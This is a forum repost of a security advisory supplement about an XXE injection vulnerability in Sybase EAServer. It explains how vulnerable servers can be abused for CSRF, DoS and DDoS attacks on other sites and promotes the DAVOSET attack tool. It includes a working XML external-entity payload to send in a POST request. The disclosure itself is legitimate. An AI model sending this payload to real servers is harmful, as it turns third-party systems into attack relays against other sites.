Matt Posted August 12, 2013 Report Posted August 12, 2013 Description : This is a supplement to the SA-20130719-0 SEC Consult advisory that notes an additional attack vector for an XXE injection vulnerability in Sybase EAServer.Author : MustLiveSource : Sybase EAServer XXE Injection ? Packet StormCode : Hello!I'll give you additional information concerning advisory SEC ConsultSA-20130719-0 :: Multiple vulnerabilities in Sybase EAServer(http://securityvulns.ru/docs29622.html). It's about XXE Injection in SybaseEAServer.Among vulnerabilities in EAServer there is XXE Injection and it was onlymentioned about local file inclusion and directory listing attack vector.But this XXE Injection vulnerability also allows to conduct attacks on othersites. So I'll supplement SEC Consult's advisory and will bring yourattention to another attack vector.I wrote about such attacks in my 2012's article "Using XML External Entities(XXE) for attacks on other sites"(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-August/008481.html)and 2013's "Using XXE vulnerabilities for attacks on other sites"(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-August/008887.html).As I described in my articles, XXE vulnerabilities can be used forconducting CSRF and DoS attacks on other sites (and at using multiple websites it's possible to conduct DDoS attacks). And last month I released atool for conducting such attacks - in DAVOSET v.1.1.2 I added support of XMLrequests for XXE vulnerabilities.XXE (WASC-43):For the attack it's needed to send the next XML data in POST request.<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://site/page">]><lol><dt><stringValue>&xxe;</stringValue><booleanValue>0</booleanValue></dt></lol>So all servers with affected versions of Sybase EAServer can be used forattacks on other sites via XXE.Best wishes & regards,MustLiveAdministrator of Websecurity web sitehttp://websecurity.com.ua Quote
